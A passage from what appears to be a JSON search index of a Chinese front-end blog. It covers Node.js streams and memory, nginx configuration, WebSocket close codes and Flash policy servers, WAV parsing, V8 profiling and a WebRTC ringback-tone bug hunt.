console.log(\u0026#39;Total lines : \u0026#39; + line_no); }) 数据解析以及写入到这块我没有贴代码。代码的执行是正常的,但是一段时间之后,程序就报错Out Of Memory。\n代码执行是在nodejs 10.16.3上运行的,谷歌搜了一下解决方案,看到有人说nodejs升级到12.x版本就可以解决这个问题。我抱着试试看的想法,升级了nodejs到最新版,果然没有再出现OOM的问题。\n后来我想,我终于深刻理解了NodeJS官网上的这篇文章 Backpressuring in Streams,以前我也读过几遍,但是不太了解,这次结合实际情况,有了深刻理解。\nNodeJS在按行读取本地文件时,大概可以达到每秒1000行的速度,然而数据写入到MySql,大概每秒100次插入的样子。\n本身网络上存在的延迟就要比读取本地磁盘要慢,读到太多的数据无法处理,只能暂时积压到内存中,然而内存有限,最终OOM的异常就抛出了。\nNodeJS 12.x应该解决了这个问题。\n参考 https://nodejs.org/en/docs/guides/backpressuring-in-streams/ ","permalink":"https://wdd.js.org/fe/oom-backpressuring-in-streams/","summary":"今天我收集了一份大概有40万行的日志,为了充分利用这份日志,我决定把日志给解析,解析完了之后,再写入mysql数据库。\n首先,对于40万行的日志,肯定不能一次性读取到内存。\n所以我用了NodeJs内置的readline模块。\nconst fs = require(\u0026#39;fs\u0026#39;) const readline = require(\u0026#39;readline\u0026#39;) let line_no = 0 let rl = readline.createInterface({ input: fs.createReadStream(\u0026#39;./my.log\u0026#39;) }) rl.on(\u0026#39;line\u0026#39;, function(line) { line_no++; console.log(line) }) // end rl.on(\u0026#39;close\u0026#39;, function(line) { console.log(\u0026#39;Total lines : \u0026#39; + line_no); }) 数据解析以及写入到这块我没有贴代码。代码的执行是正常的,但是一段时间之后,程序就报错Out Of Memory。\n代码执行是在nodejs 10.16.3上运行的,谷歌搜了一下解决方案,看到有人说nodejs升级到12.x版本就可以解决这个问题。我抱着试试看的想法,升级了nodejs到最新版,果然没有再出现OOM的问题。\n后来我想,我终于深刻理解了NodeJS官网上的这篇文章 Backpressuring in Streams,以前我也读过几遍,但是不太了解,这次结合实际情况,有了深刻理解。\nNodeJS在按行读取本地文件时,大概可以达到每秒1000行的速度,然而数据写入到MySql,大概每秒100次插入的样子。\n本身网络上存在的延迟就要比读取本地磁盘要慢,读到太多的数据无法处理,只能暂时积压到内存中,然而内存有限,最终OOM的异常就抛出了。\nNodeJS 12.x应该解决了这个问题。\n参考 https://nodejs.org/en/docs/guides/backpressuring-in-streams/ ","title":"NodeJS Out of Memory: Backpressuring in Streams"},{"content":"一般情况下,建议你不要用new Date(\u0026ldquo;time string\u0026rdquo;)的方式去做时间解析。因为不同浏览器,可能接受的time string的格式都不一样。\n你最好不要去先入为主,认为浏览器会支持你的格式。\n常见的格式 2010-10-10 19:00:00 就这种格式,在IE11上是不接受的。\n下面的比较,在IE11上返回false, 在chrome上返回true。原因就在于,IE11不支持这种格式。\nnew Date() \u0026gt; new Date(\u0026#39;2010-10-10 19:00:00\u0026#39;) 所以在时间处理上,最好选用比较靠谱的第三方库,例如dayjs, moment等等。\n千万不要先入为主!!\n","permalink":"https://wdd.js.org/fe/trap-of-new-date/","summary":"一般情况下,建议你不要用new Date(\u0026ldquo;time string\u0026rdquo;)的方式去做时间解析。因为不同浏览器,可能接受的time string的格式都不一样。\n你最好不要去先入为主,认为浏览器会支持你的格式。\n常见的格式 2010-10-10 19:00:00 就这种格式,在IE11上是不接受的。\n下面的比较,在IE11上返回false, 在chrome上返回true。原因就在于,IE11不支持这种格式。\nnew Date() \u0026gt; new Date(\u0026#39;2010-10-10 19:00:00\u0026#39;) 所以在时间处理上,最好选用比较靠谱的第三方库,例如dayjs, moment等等。\n千万不要先入为主!!","title":"new Date('time string')的陷阱"},{"content":"IE8/9原生是不支持WebSocket的,但是我们可以使用flash去模拟一个WebSocket接口出来。\n这方面,https://github.com/gimite/web-socket-js 已经可以使用。\n除了客户端之外,服务端需要做个flash安全策略设置。\n这里的服务端是指WebSocket服务器所在的服务端。默认端口是843端口。\n客户端使用flash模拟WebSocket时,会打开一个到服务端843端口的TCP连接。\n并且发送数据:\n\u0026lt;policy-file-request\u0026gt;. 
服务端需要回应下面类似的内容\n\u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;!DOCTYPE cross-domain-policy SYSTEM \u0026#34;/xml/dtds/cross-domain-policy.dtd\u0026#34;\u0026gt; \u0026lt;cross-domain-policy\u0026gt; \u0026lt;site-control permitted-cross-domain-policies=\u0026#34;all\u0026#34;/\u0026gt; \u0026lt;allow-access-from domain=\u0026#34;*\u0026#34; to-ports=\u0026#34;*\u0026#34; secure=\u0026#34;false\u0026#34;/\u0026gt; \u0026lt;allow-http-request-headers-from domain=\u0026#34;*\u0026#34; headers=\u0026#34;*\u0026#34;/\u0026gt; \u0026lt;/cross-domain-policy\u0026gt; Node.js实现 policy.js module.exports.policyFile = `\u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;!DOCTYPE cross-domain-policy SYSTEM \u0026#34;/xml/dtds/cross-domain-policy.dtd\u0026#34;\u0026gt; \u0026lt;cross-domain-policy\u0026gt; \u0026lt;site-control permitted-cross-domain-policies=\u0026#34;all\u0026#34;/\u0026gt; \u0026lt;allow-access-from domain=\u0026#34;*\u0026#34; to-ports=\u0026#34;*\u0026#34; secure=\u0026#34;false\u0026#34;/\u0026gt; \u0026lt;allow-http-request-headers-from domain=\u0026#34;*\u0026#34; headers=\u0026#34;*\u0026#34;/\u0026gt; \u0026lt;/cross-domain-policy\u0026gt;` index.js const Net = require(\u0026#39;net\u0026#39;) const {policyFile} = require(\u0026#39;./policy\u0026#39;) const port = 843 console.log(policyFile) const server = new Net.Server() server.listen(port, function() { console.log(`Server listening for connection requests on socket localhost:${port}`); }); server.on(\u0026#39;connection\u0026#39;, function(socket) { console.log(\u0026#39;A new connection has been established.\u0026#39;); socket.end(policyFile) socket.on(\u0026#39;data\u0026#39;, function(chunk) { console.log(`Data received from client: ${chunk.toString()}`); }); socket.on(\u0026#39;end\u0026#39;, function() { console.log(\u0026#39;Closing connection with the client\u0026#39;); }); socket.on(\u0026#39;error\u0026#39;, function(err) { console.log(`Error: ${err}`); }); 
}); ","permalink":"https://wdd.js.org/fe/ie89-websocket-flash/","summary":"IE8/9原生是不支持WebSocket的,但是我们可以使用flash去模拟一个WebSocket接口出来。\n这方面,https://github.com/gimite/web-socket-js 已经可以使用。\n除了客户端之外,服务端需要做个flash安全策略设置。\n这里的服务端是指WebSocket服务器所在的服务端。默认端口是843端口。\n客户端使用flash模拟WebSocket时,会打开一个到服务端843端口的TCP连接。\n并且发送数据:\n\u0026lt;policy-file-request\u0026gt;. 服务端需要回应下面类似的内容\n\u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;!DOCTYPE cross-domain-policy SYSTEM \u0026#34;/xml/dtds/cross-domain-policy.dtd\u0026#34;\u0026gt; \u0026lt;cross-domain-policy\u0026gt; \u0026lt;site-control permitted-cross-domain-policies=\u0026#34;all\u0026#34;/\u0026gt; \u0026lt;allow-access-from domain=\u0026#34;*\u0026#34; to-ports=\u0026#34;*\u0026#34; secure=\u0026#34;false\u0026#34;/\u0026gt; \u0026lt;allow-http-request-headers-from domain=\u0026#34;*\u0026#34; headers=\u0026#34;*\u0026#34;/\u0026gt; \u0026lt;/cross-domain-policy\u0026gt; Node.js实现 policy.js module.exports.policyFile = `\u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;!DOCTYPE cross-domain-policy SYSTEM \u0026#34;/xml/dtds/cross-domain-policy.dtd\u0026#34;\u0026gt; \u0026lt;cross-domain-policy\u0026gt; \u0026lt;site-control permitted-cross-domain-policies=\u0026#34;all\u0026#34;/\u0026gt; \u0026lt;allow-access-from domain=\u0026#34;*\u0026#34; to-ports=\u0026#34;*\u0026#34; secure=\u0026#34;false\u0026#34;/\u0026gt; \u0026lt;allow-http-request-headers-from domain=\u0026#34;*\u0026#34; headers=\u0026#34;*\u0026#34;/\u0026gt; \u0026lt;/cross-domain-policy\u0026gt;` index.js const Net = require(\u0026#39;net\u0026#39;) const {policyFile} = require(\u0026#39;./policy\u0026#39;) const port = 843 console.log(policyFile) const server = new Net.Server() server.listen(port, function() { console.log(`Server listening for connection requests on socket localhost:${port}`); }); server.","title":"IE8/9 
支持WebSocket方案,flash安全策略"},{"content":"电脑的风扇声突然响了起来,我知道有某个进程在占用大量CPU资源。\n在任务管理器中,可以看到vscode占用的CPU资源达到150。说明问题出在vscode上。\n在vscode中,按F1, 输入: show running extensions 可以查看所有插件的运行状况。\n其中需要关注最重要的指标就是活动时间:如果某个插件的活动时间明显是其他插件的好多倍,那问题就可能出在这个插件上。要么禁用该插件,要么卸载该插件。\n","permalink":"https://wdd.js.org/fe/vscode-high-cpu/","summary":"电脑的风扇声突然响了起来,我知道有某个进程在占用大量CPU资源。\n在任务管理器中,可以看到vscode占用的CPU资源达到150。说明问题出在vscode上。\n在vscode中,按F1, 输入: show running extensions 可以查看所有插件的运行状况。\n其中需要关注最重要的指标就是活动时间:如果某个插件的活动时间明显是其他插件的好多倍,那问题就可能出在这个插件上。要么禁用该插件,要么卸载该插件。","title":"为什么vscode会占用大量CPU资源?"},{"content":"js原生支持16进制、10进制、8进制的直接定义\nvar a = 21 // 十进制 var b = 0xee // 十六进制, 238 var c = 013 // 八进制 11 十进制转二进制字符串 var a = 21 // 十进制 a.toString(2) // \u0026#34;10101\u0026#34; 二进制转10进制 var d = \u0026#34;10101\u0026#34; parseInt(\u0026#39;10101\u0026#39;,2) // 21 ","permalink":"https://wdd.js.org/fe/bin-number-operator/","summary":"js原生支持16进制、10进制、8进制的直接定义\nvar a = 21 // 十进制 var b = 0xee // 十六进制, 238 var c = 013 // 八进制 11 十进制转二进制字符串 var a = 21 // 十进制 a.toString(2) // \u0026#34;10101\u0026#34; 二进制转10进制 var d = \u0026#34;10101\u0026#34; parseInt(\u0026#39;10101\u0026#39;,2) // 21 ","title":"js中二进制的操作"},{"content":"const fs = require(\u0026#39;fs\u0026#39;) var request = require(\u0026#39;request\u0026#39;) const zlib = require(\u0026#39;zlib\u0026#39;) const log = require(\u0026#39;./log.js\u0026#39;) const fileType = \u0026#39;\u0026#39; let endCount = 0 module.exports = (item) =\u0026gt; { return new Promise((resolve, reject) =\u0026gt; { request.get(item.url) .on(\u0026#39;error\u0026#39;, (error) =\u0026gt; { log.error(`下载失败${item.name}`) reject(error) }) .pipe(zlib.createGunzip()) .pipe(fs.createWriteStream(item.name + fileType)) .on(\u0026#39;finish\u0026#39;, (res) =\u0026gt; { log.info(`${++endCount} 完成下载 ${item.name + fileType}`) resolve(res) }) }) } ","permalink":"https://wdd.js.org/fe/nodejs-stream-unzip/","summary":"const fs = require(\u0026#39;fs\u0026#39;) var request = 
require(\u0026#39;request\u0026#39;) const zlib = require(\u0026#39;zlib\u0026#39;) const log = require(\u0026#39;./log.js\u0026#39;) const fileType = \u0026#39;\u0026#39; let endCount = 0 module.exports = (item) =\u0026gt; { return new Promise((resolve, reject) =\u0026gt; { request.get(item.url) .on(\u0026#39;error\u0026#39;, (error) =\u0026gt; { log.error(`下载失败${item.name}`) reject(error) }) .pipe(zlib.createGunzip()) .pipe(fs.createWriteStream(item.name + fileType)) .on(\u0026#39;finish\u0026#39;, (res) =\u0026gt; { log.info(`${++endCount} 完成下载 ${item.name + fileType}`) resolve(res) }) }) } ","title":"NodeJS边下载边解压gz文件"},{"content":"下面的命令可以生成一个v8的日志如 isolate-0x102d4e000-86008-v8.log\n--log-source-code 不是必传的字段,加了该字段可以定位到源码 node --prof --log-source-code index.js 下一步是将log文件转成json\nnode --prof-process --preprocess isolate-0x102d4e000-86008-v8.log \u0026gt; v8.json 然后打开 https://wangduanduan.gitee.io/v8-profiling/ 这个页面,选择v8.json\n下图横坐标是时间,纵坐标是cpu百分比。\n选择Bottom Up之后,展开JS unoptimized, 可以发现占用cpu比较高的代码的位置。\n","permalink":"https://wdd.js.org/fe/v8-profile/","summary":"下面的命令可以生成一个v8的日志如 isolate-0x102d4e000-86008-v8.log\n--log-source-code 不是必传的字段,加了该字段可以定位到源码 node --prof --log-source-code index.js 下一步是将log文件转成json\nnode --prof-process --preprocess isolate-0x102d4e000-86008-v8.log \u0026gt; v8.json 然后打开 https://wangduanduan.gitee.io/v8-profiling/ 这个页面,选择v8.json\n下图横坐标是时间,纵坐标是cpu百分比。\n选择Bottom Up之后,展开JS unoptimized, 可以发现占用cpu比较高的代码的位置。","title":"V8 Profile"},{"content":"1. 启动?停止?reload配置 nginx -s reload # 热重启 nginx -s reopen # 重启Nginx nginx -s stop # 快速关闭 nginx -s quit # 等待工作进程处理完成后关闭 nginx -T # 查看配置文件的实际内容 2. nginx如何做反向http代理 location ^~ /api { proxy_pass http://192.168.40.174:32020; } 3. 
nginx要如何配置才能处理跨域问题 location ^~ /p/asm { proxy_pass http://192.168.40.174:32020; add_header \u0026#39;Access-Control-Allow-Origin\u0026#39; \u0026#39;*\u0026#39; always; add_header \u0026#39;Access-Control-Allow-Credentials\u0026#39; \u0026#39;true\u0026#39; always; add_header \u0026#39;Access-Control-Allow-Methods\u0026#39; \u0026#39;GET,POST,PUT,DELETE,PATCH,OPTIONS\u0026#39;; add_header \u0026#39;Access-Control-Allow-Headers\u0026#39; \u0026#39;Content-Type,ssid\u0026#39;; if ($request_method = \u0026#39;OPTIONS\u0026#39;) {return 204;} proxy_redirect off; proxy_set_header Host $host; } 4. 如何拦截某个请求,直接返回某个状态码? location ^~ /p/asm { return 204 \u0026#34;OK\u0026#34;; } 5. 如何给某个路径的请求设置独立的日志文件? location ^~ /p/asm { access_log /var/log/nginx/a.log; error_log /var/log/nginx/a.err.log; } 6. 如何设置nginx的静态文件服务器 location / { add_header Cache-Control max-age=360000; root /usr/share/nginx/html/webrtc-sdk/dist/; } # 如果目标地址中没有video, video只是用来识别路径的,则需要使用 # rewrite指令去去除video路径 # 否则访问/video 就会转到 /home/resources/video 路径 location /video { rewrite /video/(.*) /$1 break; add_header Cache-Control max-age=360000; autoindex on; root /home/resources/; } 7. 反向代理时,如何做路径重写? 使用 rewrite 指令,例如 rewrite /p/(.*) /$1 break; 8. Nginx如何配置才能做websocket代理? location ^~ /websocket { proxy_pass http://192.168.40.174:31089; proxy_http_version 1.1; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection \u0026#34;Upgrade\u0026#34;; } 9. 如何调整nginx的最大打开文件限制 设置worker_rlimit_nofile\nuser root root; worker_processes 4; worker_rlimit_nofile 65535; 10. 如何判断worker_rlimit_nofile是否生效? 11. 直接返回文本 location / { default_type text/plain; return 502 \u0026#34;服务正在升级,请稍后再试……\u0026#34;; } location / { default_type text/html; return 502 \u0026#34;服务正在升级,请稍后再试……\u0026#34;; } location / { default_type application/json; return 502 \u0026#39;{\u0026#34;status\u0026#34;:502,\u0026#34;msg\u0026#34;:\u0026#34;服务正在升级,请稍后再试……\u0026#34;}\u0026#39;; } 13. 
多种日志格式 例如,不同的反向代理,使用不同的日志格式。\n例如下面,定义了三种日志格式main, main2, main3。\n在access_log 指令的路径之后,指定日志格式就可以了。\nhttp { log_format main \u0026#39;$time_iso8601 $remote_addr $status $request\u0026#39;; log_format main2 \u0026#39;$remote_addr $status $request\u0026#39;; log_format main3 \u0026#39;$status $request\u0026#39;; access_log /var/log/nginx/access.log main; 14. 权限问题 例如某些端口无法监听,则需要检查是否被selinux给拦截了。 或者nginx的启动用户不是root用户导致无法访问某些root用户的目录。\n参考 https://mp.weixin.qq.com/s/JUOyAe1oEs-WwmEmsHRn8w https://www.nginx.com/blog/tcp-load-balancing-udp-load-balancing-nginx-tips-tricks/ https://www.cnblogs.com/freeweb/p/5944894.html ","permalink":"https://wdd.js.org/fe/nginx-tips/","summary":"1. 启动?停止?reload配置 nginx -s reload # 热重启 nginx -s reopen # 重启Nginx nginx -s stop # 快速关闭 nginx -s quit # 等待工作进程处理完成后关闭 nginx -T # 查看配置文件的实际内容 2. nginx如何做反向http代理 location ^~ /api { proxy_pass http://192.168.40.174:32020; } 3. nginx要如何配置才能处理跨域问题 location ^~ /p/asm { proxy_pass http://192.168.40.174:32020; add_header \u0026#39;Access-Control-Allow-Origin\u0026#39; \u0026#39;*\u0026#39; always; add_header \u0026#39;Access-Control-Allow-Credentials\u0026#39; \u0026#39;true\u0026#39; always; add_header \u0026#39;Access-Control-Allow-Methods\u0026#39; \u0026#39;GET,POST,PUT,DELETE,PATCH,OPTIONS\u0026#39;; add_header \u0026#39;Access-Control-Allow-Headers\u0026#39; \u0026#39;Content-Type,ssid\u0026#39;; if ($request_method = \u0026#39;OPTIONS\u0026#39;) {return 204;} proxy_redirect off; proxy_set_header Host $host; } 4. 如何拦截某个请求,直接返回某个状态码? location ^~ /p/asm { return 204 \u0026#34;OK\u0026#34;; } 5.","title":"前端必会的nginx知识点"},{"content":"WebSocket断开码,一般用到的是1000-1015。\n正常的断开码是1000。其他的都是异常断开。\n场景 服务端断开码 备注 刷新浏览器页面 1001 终端离开, 可能因为服务端错误, 也可能因为浏览器正从打开连接的页面跳转离开. 关闭浏览器tab页面 1001 终端离开, 可能因为服务端错误, 也可能因为浏览器正从打开连接的页面跳转离开. 关闭浏览器, 所有标签页都会关闭。 1001 可以发现。无论是刷新,关闭tab页面还是关闭浏览器,错误码都是1001 ws.close() 1005 主动调用close, 不传递错误码。对服务端来说,也是异常断开。1005表示没有收到预期的状态码. 
ws.close(1000) 1000 正常的关闭,客户端必须传递正确的错误原因码。原因码不是随便填入的。比如 ws.close(1009) Failed to execute \u0026lsquo;close\u0026rsquo; on \u0026lsquo;WebSocket\u0026rsquo;: The code must be either 1000, or between 3000 and 4999. 1009 is neither. 客户端断网 ","permalink":"https://wdd.js.org/fe/websocket-disconnect-test/","summary":"WebSocket断开码,一般用到的是1000-1015。\n正常的断开码是1000。其他的都是异常断开。\n场景 服务端断开码 备注 刷新浏览器页面 1001 终端离开, 可能因为服务端错误, 也可能因为浏览器正从打开连接的页面跳转离开. 关闭浏览器tab页面 1001 终端离开, 可能因为服务端错误, 也可能因为浏览器正从打开连接的页面跳转离开. 关闭浏览器, 所有标签页都会关闭。 1001 可以发现。无论是刷新,关闭tab页面还是关闭浏览器,错误码都是1001 ws.close() 1005 主动调用close, 不传递错误码。对服务端来说,也是异常断开。1005表示没有收到预期的状态码. ws.close(1000) 1000 正常的关闭,客户端必须传递正确的错误原因码。原因码不是随便填入的。比如 ws.close(1009) Failed to execute \u0026lsquo;close\u0026rsquo; on \u0026lsquo;WebSocket\u0026rsquo;: The code must be either 1000, or between 3000 and 4999. 1009 is neither. 客户端断网 ","title":"WebSocket断开码测试"},{"content":"相比于普通的文件,二进制的文件略显神秘。本次就为大家揭开二进制文件的面纱。\nWAV文件的格式 下图是一个普通的wav文件的格式。其中除了最后的data部分,其他的每个格子都占用了固定大小的字节数。\n知道字节数之后,就需要按照正确的字节序读取。字节序读反了,可能读出一堆乱码。 关于字节序,可以参考阮一峰老师写的理解字节序这篇文章。\nstep1: 读取文件 const fs = require(\u0026#39;fs\u0026#39;) const path = require(\u0026#39;path\u0026#39;) const file = fs.readFileSync(path.join(__dirname, \u0026#39;./a.wav\u0026#39;)) console.log(file) 原始的打印,二进制以16进制的方式显示。看不出其中有何含义。\nnode main.js \u0026lt;Buffer 52 49 46 46 a4 23 48 00 57 41 56 45 66 6d 74 20 10 00 00 00 01 00 02 00 40 1f 00 00 00 7d 00 00 04 00 10 00 64 61 74 61 80 23 48 00 00 00 00 00 00 00 ... 4727674 more bytes\u0026gt; step2: 工具函数 // 将buf转为字符串 function buffer2String (buf) { let int = [] for (let i=0; i\u0026lt;buf.length; i++) { int.push(buf.readUInt8(i)) } return String.fromCharCode(...int) } // 对读取的头字段的值进行校验 // 实际上头字段之间是存在一定的关系的 function validWav (wav, fileSize) { //20 2 AudioFormat PCM = 1 (i.e. Linear quantization) // Values other than 1 indicate some // form of compression. // 22 2 NumChannels Mono = 1, Stereo = 2, etc. // 24 4 SampleRate 8000, 44100, etc. 
// 28 4 ByteRate == SampleRate * NumChannels * BitsPerSample/8 // 32 2 BlockAlign == NumChannels * BitsPerSample/8 // The number of bytes for one sample including // all channels. I wonder what happens when // this number isn\u0026#39;t an integer? // 34 2 BitsPerSample 8 bits = 8, 16 bits = 16, etc. if (wav.AudioFormat !== 1) { return 1 } if (![1,2].includes(wav.NumChannels)){ return 2 } if (![8000,44100].includes(wav.SampleRate)){ return 3 } if (![8,16].includes(wav.BitsPerSample)){ return 4 } if (wav.ByteRate !== wav.SampleRate * wav.NumChannels * wav.BitsPerSample / 8){ return 5 } if (wav.BlockAlign !== wav.NumChannels * wav.BitsPerSample / 8 ){ return 6 } if (wav.ChunkSize + 8 !== fileSize) { return 7 } return 0 } class ByteWalk { constructor(buf){ // 记录当前读过的字节数 this.current = 0 // 记录整个buf this.buf = buf } // 用来指定要读取的字节数,以及它的格式 step(s, f){ if (this.current === this.buf.length) { return } let bf if (arguments.length === 0) { s = this.buf.length - this.current } if (this.current + s \u0026gt;= this.buf.length) { bf = this.buf.slice(this.current, this.buf.length) this.current = this.buf.length } else { bf = this.buf.slice(this.current, this.current + s) this.current += s } // 一个特殊的标记,用来标记按照字符串的方式读取buf if (f === \u0026#39;readStringBE\u0026#39;) { return buffer2String(bf) } if (!f) { return bf } return bf[f](); } } function readData (buf, step, read) { let data = [] for (let i=0; i\u0026lt;buf.length; i += step) { data.push(buf[read](i)) } return data } module.exports = { buffer2String, // validFile, ByteWalk, validWav, readData } step3: main函数 const fs = require(\u0026#39;fs\u0026#39;) const path = require(\u0026#39;path\u0026#39;) const { ByteWalk, validWav, readData } = require(\u0026#39;./util\u0026#39;) const file = fs.readFileSync(path.join(__dirname, \u0026#39;./a.wav\u0026#39;)) const B = new ByteWalk(file) // 按照固定的字节数读取 let friendData = { ChunkID: B.step(4,\u0026#39;readStringBE\u0026#39;), ChunkSize: B.step(4, \u0026#39;readUInt32LE\u0026#39;), Format: 
B.step(4, \u0026#39;readStringBE\u0026#39;), Subchunk1ID: B.step(4, \u0026#39;readStringBE\u0026#39;), Subchunk1Size: B.step(4, \u0026#39;readUInt32LE\u0026#39;), AudioFormat: B.step(2, \u0026#39;readUInt16LE\u0026#39;), NumChannels: B.step(2, \u0026#39;readUInt16LE\u0026#39;), SampleRate: B.step(4, \u0026#39;readUInt32LE\u0026#39;), ByteRate: B.step(4, \u0026#39;readUInt32LE\u0026#39;), BlockAlign: B.step(2, \u0026#39;readUInt16LE\u0026#39;), BitsPerSample: B.step(2, \u0026#39;readUInt16LE\u0026#39;), Subchunk2ID: B.step(4, \u0026#39;readStringBE\u0026#39;), Subchunk2Size: B.step(4, \u0026#39;readUInt32LE\u0026#39;), Data: B.step() } // var data = readData(friendData.Data, friendData.BlockAlign, \u0026#39;readInt16LE\u0026#39;) console.log(validWav(friendData, file.length)) console.log(friendData, friendData.Data.length) // console.log(data) 从输出的内容可以看到,各个头字段基本上都读取出来了。\n0 { ChunkID: \u0026#39;RIFF\u0026#39;, ChunkSize: 4727716, Format: \u0026#39;WAVE\u0026#39;, Subchunk1ID: \u0026#39;fmt \u0026#39;, Subchunk1Size: 16, AudioFormat: 1, NumChannels: 2, SampleRate: 8000, ByteRate: 32000, BlockAlign: 4, BitsPerSample: 16, Subchunk2ID: \u0026#39;data\u0026#39;, Subchunk2Size: 4727680, Data: \u0026lt;Buffer 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ... 
4727630 more bytes\u0026gt; } 4727680 想要深入理解wav文件格式的,可以看下最后的参考资料。\n之后大家可以做一些有趣的事情,例如双声道的声音做声道分离,或者说双声道合并成单声道等等。\n参考资料 http://soundfile.sapp.org/doc/WaveFormat/ ","permalink":"https://wdd.js.org/fe/nodejs-read-wav-file/","summary":"相比于普通的文件,二进制的文件略显神秘。本次就为大家揭开二进制文件的面纱。\nWAV文件的格式 下图是一个普通的wav文件的格式。其中除了最后的data部分,其他的每个格子都占用了固定大小的字节数。\n知道字节数之后,就需要按照正确的字节序读取。字节序读反了,可能读出一堆乱码。 关于字节序,可以参考阮一峰老师写的理解字节序这篇文章。\nstep1: 读取文件 const fs = require(\u0026#39;fs\u0026#39;) const path = require(\u0026#39;path\u0026#39;) const file = fs.readFileSync(path.join(__dirname, \u0026#39;./a.wav\u0026#39;)) console.log(file) 原始的打印,二进制以16进制的方式显示。看不出其中有何含义。\nnode main.js \u0026lt;Buffer 52 49 46 46 a4 23 48 00 57 41 56 45 66 6d 74 20 10 00 00 00 01 00 02 00 40 1f 00 00 00 7d 00 00 04 00 10 00 64 61 74 61 80 23 48 00 00 00 00 00 00 00 .","title":"Node.js读取wav文件"},{"content":"什么是回铃音? 回铃音的特点\n回铃音是由运营商送给手机的,而不是由被叫送给主叫的。 回铃音的播放阶段是在被叫接听前播放,被叫一旦接听,回铃音则播放结束 回铃音一般是450Hz, 嘟一秒,停4秒,5秒一个周期 回铃音分为三种\n舒适噪音阶段:就是嘟一秒,停4秒的阶段 彩铃阶段:有的手机,在接听之前,会向主叫方播放个性化的语音,例如放点流行音乐之类的 定制回音阶段:例如被叫方立即把电话给拒绝了,但是主叫方这边并没有挂电话,而是在播放:对不起,您拨打的电话无人接听,请稍后再拨 问题现象 WebRTC拨打出去之后,在客户接听之前,听不到任何回铃音。在客户接听之后,可以短暂的听到一点点回铃音。 问题排查思路 服务端问题 客户端问题 网络问题 网络架构 首先根据网络架构图,我决定在a点和b点进行抓包 抓包之后用wireshark进行分析。得出以下结论\nsip服务器AB之间用的是g711编码,语音流没有加密。从b点抓的包,能够从中提取出SIP服务器B向sip服务器A发送的语音流,可以听到回铃音。说明SIP服务器A是收到了回铃音的。 ab两点之间的WebRTC语音流是加密的,无法分析出其中是否含有语音流。 虽然无法提取出WebRTC语音流。但是通过wireshark Statistics -\u0026gt; Conversation 分析,得出结论:在电话接通之前,a点收到的udp包和从b点发出的udp包的数量是一致的。说明webrtc客户端实际上是收到了语音流。只不过客户端没有播放。然后问题定位到客户端的js库。 通过分析客户端库的代码,定位到具体代码的位置。解决问题,并向开源库提交了修复bug的pull request。实际上只是修改了一行代码。https://github.com/versatica/JsSIP/pull/669 问题总结 解决问题看似很简单,但是需要很强的问题分析能力,并且对网络协议,网络架构,wireshark抓包分析都要精通,才能真正的看到深层次的东西。\n","permalink":"https://wdd.js.org/fe/webrtc-has-no-earlymedia/","summary":"什么是回铃音? 
回铃音的特点\n回铃音是由运营商送给手机的,而不是由被叫送给主叫的。 回铃音的播放阶段是在被叫接听前播放,被叫一旦接听,回铃音则播放结束 回铃音一般是450Hz, 嘟一秒,停4秒,5秒一个周期 回铃音分为三种\n舒适噪音阶段:就是嘟一秒,停4秒的阶段 彩铃阶段:有的手机,在接听之前,会向主叫方播放个性化的语音,例如放点流行音乐之类的 定制回音阶段:例如被叫方立即把电话给拒绝了,但是主叫方这边并没有挂电话,而是在播放:对不起,您拨打的电话无人接听,请稍后再拨 问题现象 WebRTC拨打出去之后,在客户接听之前,听不到任何回铃音。在客户接听之后,可以短暂的听到一点点回铃音。 问题排查思路 服务端问题 客户端问题 网络问题 网络架构 首先根据网络架构图,我决定在a点和b点进行抓包 抓包之后用wireshark进行分析。得出以下结论\nsip服务器AB之间用的是g711编码,语音流没有加密。从b点抓的包,能够从中提取出SIP服务器B向sip服务器A发送的语音流,可以听到回铃音。说明SIP服务器A是收到了回铃音的。 ab两点之间的WebRTC语音流是加密的,无法分析出其中是否含有语音流。 虽然无法提取出WebRTC语音流。但是通过wireshark Statistics -\u0026gt; Conversation 分析,得出结论:在电话接通之前,a点收到的udp包和从b点发出的udp包的数量是一致的。说明webrtc客户端实际上是收到了语音流。只不过客户端没有播放。然后问题定位到客户端的js库。 通过分析客户端库的代码,定位到具体代码的位置。解决问题,并向开源库提交了修复bug的pull request。实际上只是修改了一行代码。https://github.com/versatica/JsSIP/pull/669 问题总结 解决问题看似很简单,但是需要很强的问题分析能力,并且对网络协议,网络架构,wireshark抓包分析都要精通,才能真正的看到深层次的东西。","title":"记一次WebRTC无回铃音问题排查"},{"content":"在PC端,使用WebRTC通话一般都会使用耳麦,如果耳麦有问题,可能就会报这个错。 所以最好多换几个耳麦,试试。\n","permalink":"https://wdd.js.org/fe/webrtc-domexception/","summary":"在PC端,使用WebRTC通话一般都会使用耳麦,如果耳麦有问题,可能就会报这个错。 所以最好多换几个耳麦,试试。","title":"WebRTC getUserMedia DOMException Requested Device not found"},{"content":"client.onConnect = function (frame) { console.log(\u0026#39;onConnect\u0026#39;, frame) client.subscribe(\u0026#39;/topic/event.agent.*.abc_cc\u0026#39;, function (msg) { console.log(msg) }, { id: \u0026#39;wdd\u0026#39;, \u0026#39;x-queue-name\u0026#39;: \u0026#39;wdd-queue\u0026#39; }) } 在mq管理端:\nOptional Arguments Optional queue arguments, also known as \u0026ldquo;x-arguments\u0026rdquo; because of their field name in the AMQP 0-9-1 protocol, is a map (dictionary) of arbitrary key/value pairs that can be provided by clients when a queue is declared. 
